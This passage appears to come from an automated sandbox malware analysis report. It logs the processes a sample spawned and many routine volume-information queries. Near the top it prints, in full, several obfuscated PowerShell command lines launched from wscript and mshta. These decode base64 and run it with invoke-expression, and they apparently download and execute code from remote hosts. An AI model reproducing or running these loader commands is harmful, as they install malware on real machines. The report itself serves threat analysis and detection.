                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $familial = 'jhnlcmvuywrlid0gj2h0dhbzoi8vcmvzlmnsb3vkaw5hcnkuy29tl2r5dgzsddyxbi9pbwfnzs91cgxvywqvdje3mzmxmzq5ndcvymtschlzzxlldxq0aw1wdzuwbjeuanbnicc7jgz1z3vzid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddskym94awvyid0gjgz1z3vzlkrvd25sb2fkrgf0ysgkc2vyzw5hzgupoyrwyxj0awn1bgfyaxplid0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcojgjvegllcik7jhbsywlubmvzcya9icc8pejbu0u2nf9tvefsvd4+jzskcmf0dgxlym94zxmgpsanpdxcqvnfnjrfru5epj4noyrzdxblcnbyb2zpdca9icrwyxj0awn1bgfyaxpllkluzgv4t2yojhbsywlubmvzcyk7jgnhbnrpbgxhdgluzya9icrwyxj0awn1bgfyaxpllkluzgv4t2yojhjhdhrszwjvegvzktskc3vwzxjwcm9maxqglwdlidaglwfuzcaky2fudglsbgf0aw5nic1ndcakc3vwzxjwcm9maxq7jhn1cgvychjvzml0ics9icrwbgfpbm5lc3mutgvuz3rooyr1bmzyzwvkid0gjgnhbnrpbgxhdgluzyaticrzdxblcnbyb2zpddskdmluy2fzid0gjhbhcnrpy3vsyxjpemuuu3vic3ryaw5nkcrzdxblcnbyb2zpdcwgjhvuznjlzwqpoyrwcm9ib3njawrpyw4gpsatam9pbiaojhzpbmnhcy5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkdmluy2fzlkxlbmd0acldoyrrb21vbmrvcia9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojhbyb2jvc2npzglhbik7jg51cnnlcnltyw4gpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrrb21vbmrvcik7jgdhcm5pzxjpdgugpsbbzg5sawiusu8usg9tzv0ur2v0twv0ag9kkcdwquknktskz2fybmllcml0zs5jbnzva2uojg51bgwsieaoj3r4dc5gredgui80ndivntcxljq0lji3ms43mdevlzpwdhrojywgjyrzyxlzdccsicckc2f5c3qnlcanjhnhexn0jywgj2fzcg5ldf9jb21wawxlcicsicckc2f5c3qnlcanjhnhexn0jywnjhnhexn0jywnjhnhexn0jywnjhnhexn0jywnjhnhexn0jywnjhnhexn0jywnmscsjyrzyxlzdccpkts=';$monophthongs = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($familial));invoke-expression $monophthongs
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jdm4tdvlalpxsudyicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhzeqtvhlqzsagicagicagicagicagicagicagicagicagicagicaglu1ftwjfcmrlrklosxrjb24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvukxnb24ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagz3jkchosc3ryaw5nicagicagicagicagicagicagicagicagicagicagicboqsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagig1nesx1aw50icagicagicagicagicagicagicagicagicagicagicbwy09oeuxjtklovsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagihnjtnqpoycgicagicagicagicagicagicagicagicagicagicagic1uqw1ficagicagicagicagicagicagicagicagicagicagicaiugv6twjgd0jaziigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bbq2ugicagicagicagicagicagicagicagicagicagicagihpgy3fxayagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjdm4tdvlalpxsudyojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3mi40nc4xnzuvmjq0l25pz2h0cmlkaw5naxnyzwfsbhluawnlzm9yd29ya2luz3nrawxszw50axjldgltzwzvcm5ldy50auzgiiwijgvuvjpbufbeqvrbxg5pz2h0cmlkaw5naxnyzwfsbhluawnlzm9yd29ya2luz3nrawxszw50axjldgltzwzvcm4udmjtiiwwldapo3nuqxj0lxnmzwvwkdmpo0ljicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxg5pz2h0cmlkaw5naxnyzwfsbhluawnlzm9yd29ya2luz3nrawxszw50axjldgltzwzvcm4udmjtig=='+[char]34+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jdm4tdvlalpxsudyicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhzeqtvhlqzsagicagicagicagicagicagicagicagicagicagicaglu1ftwjfcmrlrklosxrjb24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvukxnb24ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagz3jkchosc3ryaw5nicagicagicagicagicagicagicagicagicagicagicboqsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagig1nesx1aw50icagicagicagicagicagicagicagicagicagicagicbwy09oeuxjtklovsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagihnjtnqpoycgicagicagicagicagicagicagicagicagicagicagic1uqw1ficagicagicagicagicagicagicagicagicagicagicaiugv6twjgd0jaziigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bbq2ugicagicagicagicagicagicagicagicagicagicagihpgy3fxayagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjdm4tdvlalpxsudyojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3mi40nc4xnzuvmjq0l25pz2h0cmlkaw5naxnyzwfsbhluawnlzm9yd29ya2luz3nrawxszw50axjldgltzwzvcm5ldy50auzgiiwijgvuvjpbufbeqvrbxg5pz2h0cmlkaw5naxnyzwfsbhluawnlzm9yd29ya2luz3nrawxszw50axjldgltzwzvcm4udmjtiiwwldapo3nuqxj0lxnmzwvwkdmpo0ljicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxg5pz2h0cmlkaw5naxnyzwfsbhluawnlzm9yd29ya2luz3nrawxszw50axjldgltzwzvcm4udmjtig=='+[char]34+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $familial = 'jhnlcmvuywrlid0gj2h0dhbzoi8vcmvzlmnsb3vkaw5hcnkuy29tl2r5dgzsddyxbi9pbwfnzs91cgxvywqvdje3mzmxmzq5ndcvymtschlzzxlldxq0aw1wdzuwbjeuanbnicc7jgz1z3vzid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddskym94awvyid0gjgz1z3vzlkrvd25sb2fkrgf0ysgkc2vyzw5hzgupoyrwyxj0awn1bgfyaxplid0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcojgjvegllcik7jhbsywlubmvzcya9icc8pejbu0u2nf9tvefsvd4+jzskcmf0dgxlym94zxmgpsanpdxcqvnfnjrfru5epj4noyrzdxblcnbyb2zpdca9icrwyxj0awn1bgfyaxpllkluzgv4t2yojhbsywlubmvzcyk7jgnhbnrpbgxhdgluzya9icrwyxj0awn1bgfyaxpllkluzgv4t2yojhjhdhrszwjvegvzktskc3vwzxjwcm9maxqglwdlidaglwfuzcaky2fudglsbgf0aw5nic1ndcakc3vwzxjwcm9maxq7jhn1cgvychjvzml0ics9icrwbgfpbm5lc3mutgvuz3rooyr1bmzyzwvkid0gjgnhbnrpbgxhdgluzyaticrzdxblcnbyb2zpddskdmluy2fzid0gjhbhcnrpy3vsyxjpemuuu3vic3ryaw5nkcrzdxblcnbyb2zpdcwgjhvuznjlzwqpoyrwcm9ib3njawrpyw4gpsatam9pbiaojhzpbmnhcy5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkdmluy2fzlkxlbmd0acldoyrrb21vbmrvcia9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojhbyb2jvc2npzglhbik7jg51cnnlcnltyw4gpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrrb21vbmrvcik7jgdhcm5pzxjpdgugpsbbzg5sawiusu8usg9tzv0ur2v0twv0ag9kkcdwquknktskz2fybmllcml0zs5jbnzva2uojg51bgwsieaoj3r4dc5gredgui80ndivntcxljq0lji3ms43mdevlzpwdhrojywgjyrzyxlzdccsicckc2f5c3qnlcanjhnhexn0jywgj2fzcg5ldf9jb21wawxlcicsicckc2f5c3qnlcanjhnhexn0jywnjhnhexn0jywnjhnhexn0jywnjhnhexn0jywnjhnhexn0jywnjhnhexn0jywnmscsjyrzyxlzdccpkts=';$monophthongs = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($familial));invoke-expression $monophthongsJump to behavior
                      Source: HDLzkMKGEKBh.exe, 0000000F.00000002.2657435762.0000000001590000.00000002.00000001.00040000.00000000.sdmp, HDLzkMKGEKBh.exe, 0000000F.00000000.2025080390.0000000001590000.00000002.00000001.00040000.00000000.sdmp, HDLzkMKGEKBh.exe, 00000011.00000002.2657950164.0000000000EA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: HDLzkMKGEKBh.exe, 0000000F.00000002.2657435762.0000000001590000.00000002.00000001.00040000.00000000.sdmp, HDLzkMKGEKBh.exe, 0000000F.00000000.2025080390.0000000001590000.00000002.00000001.00040000.00000000.sdmp, HDLzkMKGEKBh.exe, 00000011.00000002.2657950164.0000000000EA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: HDLzkMKGEKBh.exe, 0000000F.00000002.2657435762.0000000001590000.00000002.00000001.00040000.00000000.sdmp, HDLzkMKGEKBh.exe, 0000000F.00000000.2025080390.0000000001590000.00000002.00000001.00040000.00000000.sdmp, HDLzkMKGEKBh.exe, 00000011.00000002.2657950164.0000000000EA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                      Source: HDLzkMKGEKBh.exe, 0000000F.00000002.2657435762.0000000001590000.00000002.00000001.00040000.00000000.sdmp, HDLzkMKGEKBh.exe, 0000000F.00000000.2025080390.0000000001590000.00000002.00000001.00040000.00000000.sdmp, HDLzkMKGEKBh.exe, 00000011.00000002.2657950164.0000000000EA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
